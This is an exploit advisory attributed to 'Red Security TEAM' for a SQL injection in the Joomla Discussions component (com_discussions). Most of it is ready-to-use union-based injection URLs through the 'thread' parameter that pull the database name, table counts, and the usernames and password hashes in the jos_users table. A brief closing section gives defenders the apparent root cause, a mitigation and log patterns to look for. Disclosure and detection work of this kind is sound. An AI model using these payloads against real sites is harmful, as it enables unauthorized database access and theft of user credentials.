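#
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author: Red Security TEAM
# Date: 17/01/2012
# Risk: High
# Software: http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home: http://RedSecurity.COM
#
# Exploit :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
#
# Example :
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [GetTablesName]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from <code>information_schema</code>.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
# 3. [GetUsername]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from <code>[Database Name]</code>.jos_users Order by username limit 0,1) --+a
# 4. [GetPassword]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from <code>[Database Name]</code>.jos_users Order by username limit 0,1) --+a
#
# Notes for defenders :
# Root cause (inferred from the requests above, the component source is not shown) : the "thread" request parameter appears to reach a SQL statement without integer casting or escaping, so a single quote ends the intended value and the rest is parsed as SQL.
# Mitigation : validate "thread" and "catid" as integers before use and build the query with bound parameters or the framework's quoting routine. The advisory names no fixed version, so confirm against the extension's changelog before relying on an update.
# Detection : in web-server logs, look for requests with option=com_discussions whose "thread" value is not purely numeric (a quote, "union", "select", "information_schema", "jos_users"). If such requests returned data, treat the contents of the users table as exposed and reset the affected credentials.
#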